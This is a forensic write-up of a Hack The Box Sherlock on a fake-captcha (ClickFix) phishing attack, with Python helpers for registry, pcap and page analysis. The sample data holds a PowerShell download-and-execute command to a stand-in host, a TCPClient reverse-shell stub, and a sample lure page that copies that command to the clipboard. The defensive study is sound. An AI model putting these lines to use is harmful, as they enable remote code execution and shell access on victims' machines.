WriteUp > HTB Sherlocks — Pikaptcha

Difficulty Level: Medium
Scenario: Happy Grunwald contacted the sysadmin, Alonzo, because of issues he had downloading the latest version of Microsoft Office. He had received an email saying he needed to update, and clicked the link to do it. He reported that he visited the website and solved a captcha, but no office download page came back. Alonzo, who was bombarded with phishing attacks last year and was now aware of attacker tactics, immediately notified the security team to isolate the machine as he suspected an attack. You are provided with network traffic and endpoint artifacts to answer questions about what happened.
Q1. It is crucial to understand any payloads executed on the system for initial access. Analyzing the registry hive for user Happy Grunwald, what is the full command that was run to download and execute the stager?
To answer this we are given a KAPE triage collection, which mirrors the parts of the C:\ file structure that existed at acquisition time, including the registry hives. Since the question names a user, the hive to examine is that user's NTUSER.DAT (collected from C:\Users\<user>\). Commands typed into the Run dialog (Win+R) are recorded under the RunMRU key, which is exactly where a fake-captcha lure tells its victim to paste what it placed on the clipboard. Each value holds one command with a trailing "\1" appended by Explorer, and the MRUList value gives the order, most recent first; Registry Explorer parses the key for you, or you can load the hive with reg load and read the key directly:
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
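As an added example (not part of the original writeup), the following Python parses a `reg export` of the RunMRU key, orders the entries with MRUList and strips the "\1" suffix, which is what Registry Explorer does for you behind the scenes. The .reg text, the slot letters and the command using 192.0.2.10 are constructed for illustration and are not the challenge's data.

```python
import re
from typing import Dict, List, Tuple

# Constructed `reg export` of a RunMRU key; NOT the data from the challenge hive.
# Produce the real thing from an elevated prompt (path is wherever KAPE put the hive):
#   reg load HKU\triage C:\triage\C\Users\<user>\NTUSER.DAT
#   reg export "HKU\triage\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" runmru.reg
#   reg unload HKU\triage
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_USERS\triage\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU]
"a"="notepad\\1"
"b"="powershell -w hidden -c \"iex (irm http://192.0.2.10/update.ps1)\"\\1"
"c"="cmd\\1"
"MRUList"="bca"
'''

# "name"="value" lines; .reg escapes a backslash as \\ and a double quote as \"
_VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')


def _unescape(s: str) -> str:
    """Undo .reg string escaping: a backslash-escaped character stands for itself."""
    return re.sub(r'\\(.)', r'\1', s)


def parse_reg_values(reg_text: str) -> Dict[str, str]:
    """Return the REG_SZ values of a single-key .reg export as {name: data}."""
    values: Dict[str, str] = {}
    for line in reg_text.splitlines():
        m = _VALUE_RE.match(line.strip())
        if m:
            values[_unescape(m.group(1))] = _unescape(m.group(2))
    return values


def order_runmru(values: Dict[str, str]) -> List[Tuple[str, str]]:
    """Order RunMRU entries most-recent-first using MRUList and strip the
    trailing "\\1" that Explorer appends to every Run-dialog entry."""
    ordered = []
    for slot in values.get("MRUList", ""):
        raw = values.get(slot)
        if raw is None:          # MRUList may reference a slot that no longer exists
            continue
        cmd = raw[:-2] if raw.endswith("\\1") else raw
        ordered.append((slot, cmd))
    return ordered


def most_recent_command(reg_text: str) -> str:
    """The command the user most recently ran via Win+R (MRUList position 0)."""
    ordered = order_runmru(parse_reg_values(reg_text))
    return ordered[0][1] if ordered else ""


def load_reg_export(path: str) -> str:
    """reg export writes UTF-16LE with a BOM; read it accordingly."""
    with open(path, encoding="utf-16") as fh:
        return fh.read()


if __name__ == "__main__":
    for slot, cmd in order_runmru(parse_reg_values(SAMPLE_REG)):
        print(f"{slot}: {cmd}")
```

The most recent entry is the one whose letter appears first in MRUList, not the highest letter, so always order by MRUList before reading off the command.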

Q2. At what time in UTC did the malicious payload execute?
RunMRU stores no per-entry timestamps, but the key's last-write time is updated when an entry is added, so it gives the execution time of the most recent entry (MRUList position 0), which is the malicious command here. Registry Explorer shows it as Opened On in the RunMRU view in the screenshot above; make sure the tool is displaying UTC rather than local time before submitting.
Q3. The payload which was executed initially downloaded a PowerShell script and executed it in memory. What is the SHA256 hash of the script?
The command recovered in Q1 names the PowerShell script it downloads from the C2 server: office2024install.ps1. The question tells us it was executed in memory, so the copy to hash is the one in the network capture. In Wireshark use File > Export Objects > HTTP to save office2024install.ps1 exactly as the server delivered it, then upload it to VirusTotal (or run sha256sum on it locally). Hash the exported bytes as they are; re-saving the text through an editor can change line endings or encoding and yield a different SHA256.
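Export Objects decodes the HTTP body for you; if you instead save the server side of a followed TCP stream, you hash the transfer encoding along with the script and get the wrong value. As an added example (not from the writeup), this Python extracts and hashes the entity body of a captured HTTP response, handling chunked transfer-encoding and gzip content-encoding. The script bytes, headers and 192.0.2.10:4444 are constructed stand-ins, not the real office2024install.ps1.

```python
import gzip
import hashlib

# Constructed stand-in for the downloaded script; NOT the real office2024install.ps1.
SCRIPT = (b"# constructed sample script, not the challenge artifact\r\n"
          b"$client = New-Object System.Net.Sockets.TCPClient('192.0.2.10', 4444)\r\n")


def _chunked(body: bytes, size: int) -> bytes:
    """Encode body with HTTP/1.1 chunked transfer-encoding (to build test data)."""
    parts = [body[i:i + size] for i in range(0, len(body), size)]
    return b"".join(b"%x\r\n%s\r\n" % (len(p), p) for p in parts) + b"0\r\n\r\n"


# What "Follow TCP Stream" shows for the server side: status line, headers, chunked body.
SAMPLE_RESPONSE = (b"HTTP/1.1 200 OK\r\n"
                   b"Content-Type: text/plain\r\n"
                   b"Transfer-Encoding: chunked\r\n\r\n" + _chunked(SCRIPT, 37))

# The same script served gzip-compressed with a Content-Length instead.
_GZ = gzip.compress(SCRIPT)
SAMPLE_GZIP_RESPONSE = (b"HTTP/1.1 200 OK\r\n"
                        b"Content-Encoding: gzip\r\n"
                        b"Content-Length: %d\r\n\r\n" % len(_GZ)) + _GZ


def _dechunk(data: bytes) -> bytes:
    """Reassemble a chunked body: <hex size>\\r\\n<data>\\r\\n ... 0\\r\\n\\r\\n."""
    out = bytearray()
    pos = 0
    while True:
        end = data.index(b"\r\n", pos)
        size = int(data[pos:end].split(b";")[0], 16)   # drop any chunk extension
        pos = end + 2
        if size == 0:
            break
        out += data[pos:pos + size]
        pos += size + 2                                # skip data and its CRLF
    return bytes(out)


def http_body(raw: bytes) -> bytes:
    """Return the decoded entity body of one HTTP/1.x response."""
    head, _, rest = raw.partition(b"\r\n\r\n")
    headers = {}
    for line in head.split(b"\r\n")[1:]:               # [0] is the status line
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip().lower()
    if b"chunked" in headers.get(b"transfer-encoding", b""):
        body = _dechunk(rest)
    elif b"content-length" in headers:
        body = rest[:int(headers[b"content-length"])]
    else:
        body = rest                                    # delimited by connection close
    if headers.get(b"content-encoding") == b"gzip":
        body = gzip.decompress(body)
    return body


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def script_hash_from_response(raw: bytes) -> str:
    """SHA-256 of the script exactly as the server delivered it."""
    return sha256_hex(http_body(raw))


if __name__ == "__main__":
    print("body   :", script_hash_from_response(SAMPLE_RESPONSE))
    print("stream :", sha256_hex(SAMPLE_RESPONSE), "(wrong: includes headers and chunking)")
```

Both sample responses decode to the same script and therefore the same SHA-256, while hashing the raw stream gives a value VirusTotal will never have seen.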


Q4. To which port did the reverse shell connect?
The PowerShell shown in the screenshot above is the downloaded script, and the port is hard-coded in its connection setup: a reverse shell has to know which C2 address and port to call back to. Cross-check it in the capture: a TCP conversation from the victim to the C2 IP on that port should begin right after the script download.
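Reverse-shell launchers are often wrapped in -EncodedCommand (base64 over UTF-16LE), so the host and port are not visible until the argument is decoded. As an added example (not from the writeup), this Python decodes such a command line and pulls the TCPClient target out of the result; the script text, the encoded command line and 192.0.2.10:4444 are constructed, not the challenge's payload, and the regexes cover only the common TCPClient/Connect patterns.

```python
import base64
import re
from typing import List, Optional, Tuple

# Constructed reverse-shell stub; NOT the challenge's script. 192.0.2.10:4444 is made up.
SAMPLE_SCRIPT = ("$client = New-Object System.Net.Sockets.TCPClient('192.0.2.10', 4444);"
                 "$stream = $client.GetStream();")

# The same script as it would appear on a command line with -EncodedCommand:
# base64 over the UTF-16LE bytes of the script text.
SAMPLE_CMDLINE = "powershell -nop -w hidden -enc " + base64.b64encode(
    SAMPLE_SCRIPT.encode("utf-16-le")).decode()

# powershell.exe accepts unambiguous prefixes of -EncodedCommand (-e, -ec, -en, -enc, ...).
_ENC_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")

# New-Object ...TCPClient(host, port) or $socket.Connect(host, port) with literal arguments.
_TARGET_RE = re.compile(
    r"""(?:TCPClient|\.Connect)\s*\(\s*['"]?([\w.\-]+)['"]?\s*,\s*(\d{1,5})\s*\)""", re.I)


def decode_encoded_command(cmdline: str) -> str:
    """Return the script text: decoded if an -EncodedCommand is present, else unchanged."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return cmdline
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline            # not a valid encoded command; analyse the raw line


def find_tcp_targets(script: str) -> List[Tuple[str, int]]:
    """Every (host, port) a TCP client is pointed at in the script, in order."""
    return [(host, int(port)) for host, port in _TARGET_RE.findall(script)]


def reverse_shell_port(cmdline: str) -> Optional[int]:
    """Port of the first outbound TCP connection the command line sets up."""
    targets = find_tcp_targets(decode_encoded_command(cmdline))
    return targets[0][1] if targets else None


if __name__ == "__main__":
    print(decode_encoded_command(SAMPLE_CMDLINE))
    print(find_tcp_targets(SAMPLE_SCRIPT))
```

Once the port is known, the matching conversation in the capture confirms the shell actually connected.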


Q5. For how many seconds was the reverse shell connection established between C2 and the victim’s workstation?
Wireshark's Statistics > Conversations (TCP tab) lists every TCP conversation with its start time and duration, the duration being the interval between the first and last packet of that conversation. The row for the victim talking to the C2 IP on the reverse-shell port found in Q4 gives the answer in seconds.
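The same figure can be computed from the command line, which is handy when scripting across many captures. As an added example (not from the writeup), this Python groups packets into conversations the way Wireshark's Conversations table does (both directions of an endpoint pair count as one conversation) and reports the duration of the one touching the C2 port. The tshark field dump is constructed; hosts, ports and timestamps are made up, with 192.0.2.10 standing in for the C2.

```python
from typing import Dict, List, NamedTuple, Optional, Tuple


class Packet(NamedTuple):
    ts: float
    src: str
    sport: int
    dst: str
    dport: int


# Constructed output of:
#   tshark -r capture.pcap -Y tcp -T fields -e frame.time_epoch \
#          -e ip.src -e tcp.srcport -e ip.dst -e tcp.dstport
# A short HTTP exchange on port 80 followed by a longer session on port 4444.
SAMPLE_TSHARK = """\
1700000000.000000\t10.10.10.5\t49810\t192.0.2.10\t80
1700000000.120000\t192.0.2.10\t80\t10.10.10.5\t49810
1700000003.500000\t10.10.10.5\t49812\t192.0.2.10\t4444
1700000003.510000\t192.0.2.10\t4444\t10.10.10.5\t49812
1700000060.250000\t10.10.10.5\t49812\t192.0.2.10\t4444
1700000121.000000\t192.0.2.10\t4444\t10.10.10.5\t49812
"""

Endpoint = Tuple[str, int]


def parse_tshark_fields(text: str) -> List[Packet]:
    """Parse tab-separated tshark -T fields output into Packet records."""
    packets = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, sport, dst, dport = line.split("\t")
        packets.append(Packet(float(ts), src, int(sport), dst, int(dport)))
    return packets


def tcp_conversations(packets: List[Packet]) -> Dict[tuple, Dict[str, float]]:
    """Group packets by unordered endpoint pair, like Wireshark's Conversations > TCP."""
    convs: Dict[tuple, Dict[str, float]] = {}
    for p in packets:
        key = tuple(sorted([(p.src, p.sport), (p.dst, p.dport)]))
        c = convs.setdefault(key, {"start": p.ts, "end": p.ts, "frames": 0})
        c["start"] = min(c["start"], p.ts)
        c["end"] = max(c["end"], p.ts)
        c["frames"] += 1
    return convs


def conversation_duration(packets: List[Packet], host: str, port: int) -> Optional[float]:
    """Seconds between the first and last frame of the conversation involving host:port."""
    for key, c in tcp_conversations(packets).items():
        if (host, port) in key:
            return round(c["end"] - c["start"], 6)   # pcap timestamps have microsecond resolution
    return None


if __name__ == "__main__":
    pkts = parse_tshark_fields(SAMPLE_TSHARK)
    for key, c in tcp_conversations(pkts).items():
        print(key, f'{c["frames"]} frames, {c["end"] - c["start"]:.3f} s')
```

For a quick one-off, `tshark -r capture.pcap -q -z conv,tcp` prints the same table Wireshark shows under Statistics > Conversations.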

Q6. Attacker hosted a malicious Captcha to lure in users. What is the name of the function which contains the malicious payload to be pasted in victim’s clipboard?
We know the attacker's IP (the C2), so filter the capture to HTTP traffic involving that host (for example ip.addr == <C2 IP> && http), find the request for the captcha page and follow its HTTP stream.



Following this stream shows the HTML, CSS and JavaScript that implement the fake captcha. Look for the function that writes to the clipboard (navigator.clipboard.writeText or document.execCommand('copy')); the string it copies is the Run-dialog command recovered in Q1, and that function's name is the answer.
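Reading the page by eye works for one lure; for triaging many saved ClickFix pages a small script does the same job. As an added example (not from the writeup), this Python locates every named function whose body calls a clipboard API and lists the string literals inside it, longest first, since the staged command is normally the longest one. The HTML page, function names and the command pointing at 192.0.2.10 are constructed and are not the page served by the challenge C2; the brace matcher deliberately ignores braces inside string literals.

```python
import re
from typing import Iterator, List, Tuple

# Constructed fake-captcha page in the ClickFix style; NOT the challenge's real page.
SAMPLE_PAGE = """\
<div class="captcha"><input id="box" type="checkbox" onclick="verifyHuman()"> I'm not a robot</div>
<script>
function verifyHuman() {
  document.getElementById('box').checked = true;
  stageCommand();
  showInstructions();
}
function stageCommand() {
  const cmd = 'powershell -w hidden -c "iex (irm http://192.0.2.10/update.ps1)" # I am not a robot';
  navigator.clipboard.writeText(cmd);
}
function showInstructions() {
  alert('Press Win+R, then Ctrl+V, then Enter');
}
</script>
"""

# The three ways browser JavaScript can put text on the clipboard.
CLIPBOARD_APIS = ("navigator.clipboard.writeText", "document.execCommand", "clipboardData.setData")

_FUNC_RE = re.compile(r"function\s+([A-Za-z_$][\w$]*)\s*\([^)]*\)\s*\{")
_STR_RE = re.compile(r"""'((?:[^'\\]|\\.)*)'|"((?:[^"\\]|\\.)*)"|`((?:[^`\\]|\\.)*)`""")


def function_bodies(js: str) -> Iterator[Tuple[str, str]]:
    """Yield (name, body) for each named function declaration, by brace matching.
    Simplification: braces inside string literals are not special-cased."""
    for m in _FUNC_RE.finditer(js):
        depth, i = 1, m.end()
        while i < len(js) and depth:
            depth += {"{": 1, "}": -1}.get(js[i], 0)
            i += 1
        yield m.group(1), js[m.end():i - 1]


def clipboard_functions(page: str) -> List[str]:
    """Names of functions whose body writes to the clipboard."""
    return [name for name, body in function_bodies(page)
            if any(api in body for api in CLIPBOARD_APIS)]


def string_literals(page: str, func_name: str) -> List[str]:
    """String literals inside func_name, longest first."""
    for name, body in function_bodies(page):
        if name == func_name:
            lits = ["".join(groups) for groups in _STR_RE.findall(body)]
            return sorted(lits, key=len, reverse=True)
    return []


if __name__ == "__main__":
    for fn in clipboard_functions(SAMPLE_PAGE):
        print(fn, "->", string_literals(SAMPLE_PAGE, fn)[:1])
```

The literal recovered from the clipboard-writing function should match the RunMRU entry from Q1; if it does not, the page assembles the command from several pieces and the remaining literals need to be read together.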
Challenge Link: https://app.hackthebox.com/sherlocks/Pikaptcha